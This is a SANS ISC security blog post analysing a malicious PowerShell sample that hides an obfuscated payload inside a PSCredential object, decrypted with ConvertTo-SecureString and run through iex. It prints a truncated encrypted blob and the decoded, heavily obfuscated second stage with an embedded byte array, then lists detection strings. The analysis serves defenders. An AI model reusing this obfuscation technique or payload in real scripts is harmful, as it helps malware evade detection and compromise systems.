Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Powershell Payload Stored in a PSCredential Object

Published: 2020-04-27
Last Updated: 2020-04-27 06:44:36 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

An interesting obfuscation technique to store a malicious payload in a PowerShell script: In a PSCredential object!

The PSCredential[1] class can be used to manage credentials in a centralized way. Just have a look at this example.

First, let's encrypt our strong password:

PS C:\Users\REM> $password = ConvertTo-SecureString 'MyStr0ngP4ssw0rd' -AsPlainText -Force
PS C:\Users\REM> $password
System.Security.SecureString

Now, we can create the PSCredential object:

PS C:\Users\REM> $credential = New-Object System.Management.Automation.PSCredential ('admin', $password)
PS C:\Users\REM> $credential

UserName                     Password
--------                     --------
admin    System.Security.SecureString

To get the password in cleartext, just do this:

PS C:\Users\REM> $credential.GetNetworkCredential().Password
MyStr0ngP4ssw0rd

The sample that I found implements the same technique but, as you can expect now, the password is not a simple string but PowerShell code that can be processed via 'IEX'. Here is the sample of code:

( NEw-ObJECT manaGEMeNT.AUtomatiON.pScreDENtial  ' ', ( '
76492d1116743f0423413b16050a5345MgB8AEUANQBJAHEATABtAHUAVAB1AEoAdwBYADkAMgA1AHYANgBqADUAZgBuAGcAPQA9AHwAMAA1AGQAMQAzADEAOABmADcAOAA1AGMAZQBjAGIAMAB
jADIAYQBhADQAZQA0ADMAZQAzADIAOABmAGMANQA3ADkAMABhADYANwA5ADEAZgA5ADgAYgA4AGMANgA1AGYAYwAzADEANwA3ADEAYQA0AGMANwBiADQAZAA3AGIANgBiAGYANwBiAGYAZQA0AD
EAZgBjADQAOABkAGIAZAAxAGUAYgA2ADEAZABkADMAMQA0ADcAZQBmAGYAZQA0ADEAYwA3AGMAMAA2ADgANAA4ADIANQA5ADkAZAAwADIAZAAyAGIAYgA0AGMAYQAxAGIANQAyADMAYgBjADcAO
QA0AGIANgA2ADAAMAA1ADkANgA0ADMAYQA2AGEANwBlADgAMgAxAGYAZAAyAGMAZgA4AGQANwBmAGIAOQAxADIAYgBiAGEAYQAxAGQAYgA1ADQAOAA4ADAAZAA5ADQAOAAwADAAMwA5ADcANQBh
AGQAZQA4ADMAZgAwADYAZQBkAGQAMgBjADAANQA3AGEAZgBhADgAOQBmADkAMAA2ADcAZAA5AGIAYwBiADAAOAAxADkAOAAxAGUANwBlAGQAZgA5ADQANgAwADkAOQBiADAAYgBkADIAZQBhADU
AZAA0ADAANgBiAGQAMABlAGUAOABmADEAYgA4ADEAMgBlAGMAOABhADAAYQAyADAAZgBkADMANwBjADQANABkAGUAMQAzADMANQBhADUAZgAyADMAYgBiADUAMQBiAGYANgAwADUAYgBjADMAMA
AzAGQANAA1ADkANQBmADcAYgA1ADIAZQA0ADIAOQA0ADQAMwBmAGMANgA1AGIAOQA2ADQAMwBmAGEAOAAzADUAZABmADgAMABmAGQAZQBmADQAZgAwAGUAYQBkAGEAOQAyADgANwA0AGUANABjA
DcANQAyADEAMgBjADEAMgBjADgAMgBkADYAMgAyADYAMwBmAGYAMgBmADgAZQA0ADUAZAA2ADcAZQAwAGUANQAzAGYAZABkADgANwA5AGIAOQA1AGIAMAAwAGUANwA4AGMAYwA0ADQAYgAxAGQA
NgBkAGUAOQA1ADkAYwA1ADcANwA4AGEAMQAxAGQAYgBiAGMANQAwADIAYQA5AGUAYgA5AGEAZQBlAGEAMQBiAGQAYQA3ADgANQBlADQAMgAyADAAMABhAGQAOAA1ADQAOQBhADkAMwA1ADIAMwA
3AGEAYQBlADEAZgAxADgANwA5ADMAYwA5AGUAZgA1AGQAMAA5AGMAOQA4ADQAMwAyADcAZgA0ADAAYgA2ADUANwA1ADEANQAyAGMAMAAxADcAYQBhADMANwAyADkAYQAyADYAYwBmAGUAZgBlAD
UAOABkADAAZgA2ADAAYwAyAGYAYgBhADEANgBkAGIAOAAyAGMAMgBlADYAMgBkADUAMABhAGIAMQAwADkAMwBjAGMANQBmADMAMABkADgANwAxADQAZQAwADAAMwBjADgAMABlADUAYwBjADYAY
(...code removed...)
ADEAMAA3ADQANgAyADgAZQBiADIANwBhADkAYwAxADkAMABlADQANQA1ADcAMQBjAGMAMQAwADEAZAA5ADgAOQBiADkANwAwAGEAZQA4ADcAZAAzAGMAZAA2ADMAZgBhAGUANgBiAGMAZABiADQ
AOABjADQAOQBmADgANAA0AGMAMgBjAGMAOABjAGUANwA4ADcAYwBmAGQAYgBhAGIAYgAzAGEAOAA1AGEAMAAwADYAOQA0AGQAYQBlADcAOABjAGEANgA2ADkANgBjADAAMwA5ADMAOQBmADAAMQ
AxAGMAZQBiAGEAZAAyADgAMQAzADMAZAAyAGMAZABkAGEAYgBkADgAYwA5AGYAMQBkADMAMAA0ADAANgBhADEAYgA5AGQAYgBmADAAZgBjAGYANwA2AGMAMwA2ADIAZAA2ADQANABkADQANwBlA
DgAMwAxAGQAYQBiADIAMQA5AGQAMgBmADAAYQBmADkAZgAzAGMANAAyAGUAZQAyAGQAMwA1ADgANwAwADYANwBmADYAOAA1ADYAOAA3ADYANABkAGIAOABiADQAMgA2ADUANAA4AGEAZQA3ADYA
'|cOnVErtTo-seCUreSTriNG -KeY (1..32) )).getnETwoRKcrEDEnTiaL().PAsSWOrD | iex

I removed most of the data for more readability. The complete code is approximately 70KB.

You can see the presence of a call to ConvertTo-SecureString(). It's mandatory to convert the string into a secure string. Indeed, SecureStrings can't be printed as regular strings and must be converted. You can compare ConvertTo-SecureString to decoding a Base64 chunk of data.

Here is the content of the "password":

. ( $VERBOSePRefereNCe.toSTRiNG()[1,3]+'X'-join'')( [sTRInG]::join( '' ,([rEGEX]::mAtchEs( ") )63]RAHc[]GniRts[,)96]RAHc[+79]RAHc[+201]RAHc[(
(EcAlPeR.)43]RAHc[]GniRts[,'iWy'(EcAlPeR.)93]RAHc[]GniRts[,)78]RAHc[+511]RAHc[+66]RAHc[((EcAlPeR.)'}5dx'+'0,ffx0,35x0,0x0,a6x0,65x0,2ax0,5bx0,
0fx0,bbx0,0x0,56'+'x0,d6x0,e2x0,37x0,e6x0,46x0,46x0,97x0,d6x0,e2x0,e6x0,46x0,46x0,ffx0,ffx0,ffx0,b6x0,8ex0,f5x0,3cx0,85x0,5ex0,57x0,0cx0,58x0,
3cx0'+',1x0,7x0,b8x0,fcx0,47x0,0cx'+'0,58x0,5dx0,ffx0,2ex0,98x0,69x0,21x0,86x0,65x0,35x0,0x0,0x0,02x0,0x0,86x'+'0,'+'75x0,7ex0,98x0,35x0,35x0,
39x0,5dx0'+',ffx0,5ex'+'0,35x0,4ax0,85x0,86x0,35x'+'0,0x0,04x0,0x0,0x0,86x0,0x0,0x0,01x0,0x0,'+'86x0,04x0,a6x0,0x0,0x0,0x0,a4x0,8ex0,dcx0,57x0
,f4x0,5dx0,ffx0,0ex0,53x0,0fx0,44x0,86x0,0x0,0x0,31x0,88x0,86x0,41x0,57x0,0cx0,58x0,5dx0,ffx0,b7x0,81x0,6x0,d2x0,8'+'6x0,65x0,35'+'x0,35x0,35x
0,35x0,5dx0,ffx0,68x0,e9x0,64x0,57'+'x0,8'+'6x0,65x0,f1x'+'0,a6x0,05x0,4x0,a6x0,0ex0,98x0,0x0,0x0,33x0'+',08x0,86x0,f5x0,ax0,a6x0,69x0,5dx0,ff
x0,b3x0,e2x0,55x0,bex0,86x0,65x0,35x0,75x0,35x'+'0,35x0,35x0,48x0,0ex0,23x0,0x0,86x0,35x0,6cx0,98x0,5dx0,ffx0,6cx0,f9x0,98x0,75x0,8'+'6x0'+',0
5x0,0x0,37x0,86x0,93x'+'0,37x0,64x0,b4x0,07x0,26x0'+',14x0,45x0,13x0,d6x0,14x0,17x0,86x0,47x0,14x0,34x0,77x0,03x0,27x0,24x0,85x0,96x0,'+'d2x0,
f4x0,86x0,e4x0,14'+'x0,17x0,65x0,76x0,37x0,37x0,97x0,c4x0,c6x0,13x0,'+'47x0,15x0,a6x0,57x0,47x0,95x0,85x0,03x0,15x'+'0,96x0,15x0,85x0,45x0,05x
0,d4x0,74x0,25x0,84x0,53x0,03x0,c4x0,47x0,13x0,a5'+'x0,73x0,74'+'x0,43x0,14x0,77x0,e6x0,d6x0,54x0,7'+'5x0,35x0,75x0,77x0,b6x0,54x0,14x0,67x0,f
5x0,'+'a6x0,43x0,95x0,15x0,e4x0,53x0,55x0,26x0,f2x0,0x0,0x0,0x0,8ex0,8ex0,0x0,0x0,1x0,bbx0,86x0,35x0,35x0,3x0,a6x0,35x'+'0,35x0,5dx0,ffx0,7ax0
,97x0,65x0,a3x0,86x0,0x0,f6x0,b6x0,36x0,56x0,74x0,02x0,56x0,b6x0,96'+'x0,c6x0,02x0,92x0,03x0,e2x0,13x0,13x0,a3x0,67'+'x0,27x0,02x0,b3x0,03x0,e
2x0,73x0,f2x0,47x0,e6x0,56x0,46x0,96x0,27'+'x0,45x0,02x0,b3x0,13x0,e2x0,63x0,02x0,45x0,e4x0,02x0,37x0,77x0,f6x0,46x0,e6x0'+',96x0,75x0,82x0,02
x'+'0,03x0,e2x0,53x0,f2x0,16x0,c6x0,c6x0,96x0,a7x0,f'+'6x0,d4x0,0x0,0x0,0x0,e3x0,8ex0,35x0,35x0,35x0,35x0,35'+'x0,bdx0,13x0,5dx0,ffx0,7x0,62'+
'x0'+',77x0,c4x0,86x0,45x0,96x0,e6x0,96x0,77x0,86x0,0x0,47x0,56x0,e6x0,86x0,d5x0,d8x0,bex0,21x0,b8x0,a5x0,f5x0,f5x0,0ex0,ffx'+'0'+',15x0,a5x0,
95x0,16x0,b5x0,b5x0,42x0,42x0,44x0,98x0,0dx0,1x0,b8x0,4x0,b8x0,3dx0,1x0,c1x0,85x0,b8x0,b4'+'x0,cx0,b8x0,'+'66x0,3dx0,1x0,42x0'+',8'+'5x0,b8x0,
85x0,4ex0,57x0,42x0,d7x0,b3x'+'0,8fx0,d7x0,3x0,6fx0,57x0,0ex0,83x0,7cx0,1x0,dx0,fcx0,1cx0,cax0,ffx0,13x0,6dx0,1x0,b8x0,43x0,b8x0,94x0,a3x0,3ex
0,81x0,94x0,b8x0,3dx0,1x0,02x0,95x0,b8x0,1'+'5x0,1dx0,1x0,84x0,3ex0,87x0,11x0,c4x0,b8x0,c3x0,a4x0,b8x0,01x0,25x0,b8x0,75x0,25x0,2fx0,2ex0,7cx0
,1x0,dx0,fcx0,1cx0,02x0,c2x0,2x0,c7x'+'0,16x0,c3x0,cax0,ffx0,13x0,62x0,a4x0,7b'+'x0,fx0,82x0,27x0,b8x0,41x0,25x0,b8x0,cx0,25x0,b8x0,03x0,0'+'5
x0,b8x0,46x'+'0,0cx'+'0,13x0,5ex0,98x0,06x0,0x0,0x0,0x0,28x0,8ex0,cfx0 = fubEaf ]][etyB[ = fubEaf '+']][etyB[{esle}5dx0,ffx0,65x0,2ax0,5bx0,0f
x0,2c'+'x0,7cx0,94x0,95x0,0x0,a6x0,85x0,'+'3cx0,85x0,2dx0,57x0,0cx0,58x0,3cx0,1x0,84x0,7x0,b8x0,66x0,2bx0,47x0,0cx0,58'+'x0,02x0,4cx0,'+'38'+'
x0,84x0,5dx0,ffx0,0x0,0x0,0x0,0x0,2ex0,98x0,69x0,21x0,abx0,94x0,9f'+'x0,98x0,94x0,0x0,'+'0x0,02x0'+',0x0,0cx0,7cx0,94x0,adx0,98x0,84x0,1fx0,98
x0,84x0,7ex0,98x0,84x0,35x0,35x0,39x0,84x0,'+'5dx0,ffx0,0x0,0x0,0x0,0x0,5ex0,35x0,4ax0,85x0,abx0,94x0,0x0,0x0,01x0,0x0,0cx0,7cx0,94x0,01x0,2ex
0,1cx0,1dx0,98x0,94x0,a5x0,04x0,a6x0,95x0,35x0,'+'0x0,0x0,0x0,55x0,8ex0,aax0,bex0,2x0,4'+'7x0,fcx0,ffx0,84x0,5dx0,ffx0,0x0,0x0,0x0,0x0,'+'0ex0
,53x0,0fx0,44x0,abx0,94x0,0x0,0x0,31x0,88x0,1cx0,7cx'+'0,84x0,f'+'1x0,57x0,0cx0,58x0,5dx0,ffx0,b7x0,81x0,6x0,d2x0,2cx0,7cx0,94x0,35x0,35x0,9cx
0,13x0,d4x0,9cx0,13x0,d4x0,1fx0,98x0,84x0,a5'+'x0,35x0,0cx0,13x0,d4x0,5d'+'x0,ffx0,0x0,0x0,0x0,0x0,68x0,e9'+'x0,64x0,57x0,abx0,94x0,95x0,14x0,
4x0,a6x0,0ex0,98x0,94x0,0x0,0x'+'0,33x0,08x0,86x0,25x0,a5'+'x0,f1x0,a6x0,1fx0,98x0,84x0,f5x0,ax0,a6x'+'0,6cx0,98x0,84x0,5dx0,ffx0'+',b3x0,e2x0
,55x0,bex0,2cx0,7cx0,94x0,35x0,35x0,05x0,0x0,0x0,0x0,0x0,48x'+'0,0ax0,23x0,0x0,8bx0,84x0,'+'35x0,9cx0,13x0,d4x0,85x0,14x0,a5x0,35x0,1cx0,98x0,
84x0,0x0,17x0,66x0,65x0,63x0,a6'+'x0,93x0,16x0,67x0,83x0,54x0,76x0,84x0,d4x0,d2'+'x0,26x0,05x0,67x0,94x0,46x0,45x0,34x0,74x0,03x0,a6x0,d4x0,e6
x0,03x0,37x0,46x0,25x0,53x0,63x0,54'+'x0,97x0,b4x0,96x'+'0,95'+'x0,d6x0,67x0,34x0,37x0,d2x0,46x0,37x0,47x0,43x0,33x0,46x0,77x0,34x0,05x0,96x0'
+','+'c4x0,64x0,35x0,24x0,85x0,23x0,33x0,43x0,25x0,63x0,64x0,c4x0,a5x0,53x0,13x0,53x'+'0,56x0,e6x0,e4x0,66x0,f4x0,84x0,a5x0,a6x0,13x0,a7x0,f4x
0,26x0,76x0,85x0,15x0,36x0,97x0,86x0,a4x0,76'+'x0,c4x0,17x0,45x0,26x0,64x0,37x0,86x0,b6x0,26x0,'+'a4x0,64x0,76x0,86x0,56x0,74x0,13x0,76x0,15x0
,e4x0,67x0,07x0,f2x0,0x0,0x0,0x0,f6x0,8ex0,5dx0,ffx0,0x0,0x0,0x0,0x0,6cx0'+',f9x0,98x0,75x0,abx0,94x0,35x0,3x0,a6x0,35x0,35x0,9cx0,13x0,d4x0,0
x0,0x0,1x0,bbx0,0cx0,7cx0,94x0,1cx0,98x0,84x0,a5x0,0x0,56x0,d6x0,e2x0,37x0,e6x0,46x0,46x0,97x0,d6x0,e2x0,e6x0,46x0,46x0,0x0,0x0,0x0,ex0,8ex0,5
dx0,ffx0,0x0,0x0,0x0,0x0,7ax0,97x0,65x0,a3x0,abx0,94x0,35x0,35x0,9cx0,13x0,d4x0,0cx0,13x0,d4x0,a5x0,35x0'+',1ex0,98x0,84x0,35x0,35x0,5dx0,ffx0
,7x0,62'+'x0,77x0'+',c4x0,2cx0,7cx0,94x0,1ex0,98x0,84x0,65x0,14x0,0x0,47x0,56x0,e6x0,96x0,e6x0,96x0'+',77x0,ebx0'+',94x'+'0,35x0,bdx0,13x0,84x
0,d5x0,ffx0,ffx0,f'+'fx0,b4x0'+',9ex0,21x0,b8x0,84x0,a5x0,95x0,14x0,85x0,0ex0,ffx0,25x0,14x0,02x0,cex0,38x0,84x0,a5x0,14x0,95x0,14x0,85x0,'+'1
4x0,a5x0,95x0,e5x0,85x0,14x0,85x0,14x0'+',0dx0,1x0,84x0,88x0,4x0,b8x0,14x0,0dx0,1x0,94x0,c1x0,04x0,b8x0,44x0,84x0,cx0,b8x0,14x0,66x0,0'+'dx0,1
x0,94x0,42x0,04x0,b8x0,44x0,85'+'x0,8dx0,5'+'7x0,1dx0,93x0,54x0,8x0,42x0'+',c4x0,3x0,c4x'+'0,1fx0,57x0,0ex0,83x0,1cx0,1x0,14x0,dx0,9cx0,1cx0,1
4x0,cax0,0'+'cx0,13x0,84x0'+',9cx0,13x0,d4x0,6dx0,1x0,84x0,88x0,43x0,b8x0,14x0'+',9cx0,ffx0,84x0,65x0,3ex0,0dx0,1x0,94x0,02x0,04x0,b8x0,44x0,8
1x0,84x0,b8x0,05x0,0dx0,1x0,84x0,76x0,47x0,0cx0,58x0,84x0,0x0,0x0,0x0,88x0,08x0,'+'b8x0,0x0,0x0,0x0,27x0,58x0,fx0,2x0,bx0,81x0,8'+'7x0,18x0,66
x0,0dx0,1x0,84x0,c3x0,24x0,b8x0,02x0,25x0,b8x0,84x0,15x0,14x0,25x0,dex0,2ex0,1cx0,1x0,14x0,dx0,9cx0,1cx0,'+'14x0,02x0,c2x0,2x0,c7x0,16x0,c3x0,
cax0,0cx0,13x0,84x0,9cx0,13x0,d4x0,a4x0'+',a4x0,7bx'+'0,f'+'x0,84x0,05x0,27x0,b8x0,84x0,02'+'x0,25x0,b8x0,84x0,81x'+'0,25x0,b8x0,84x0,06x0,25x
0,b8x0,84x0,56x0,2dx0,13'+'x0,84x'+'0,65x0,15x0,25x0,05x0,14x0,15x0,14x0,0x0,0x0,0x0,ccx0,8ex0,0fx0,4ex0,38x0,84x0,cfx0 = fub'+'Eaf ]][etyB[ =
 fubEaf ]][etyB[{)WsB46DMAWsB qe- '+']iWyERUTCETIHCRA_ROSSECORPiWy[selbairaVtnemnorivnE.ofnItratS.kcu'+'femosEaf( fi'(( )'x'+]31[DiLLeHs$+]1[D
iLleHs$ ( & " ,'.', 'R'+'ig'+'hTTOLe'+'FT')| foreAch{$_.vAlUE })) )

If you're interested in this technique, the file is available on VT (SHA256:ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302) with a score of 6/59[2].

Based on this, I added 'Management.Automation.PSCredential' and 'ConvertTo-SecureString' to the list of suspicious strings to track in PowerShell scripts!

[1] https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.pscredential?view=pscore-6.2.0
[2] https://www.virustotal.com/gui/file/ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
Diary Archives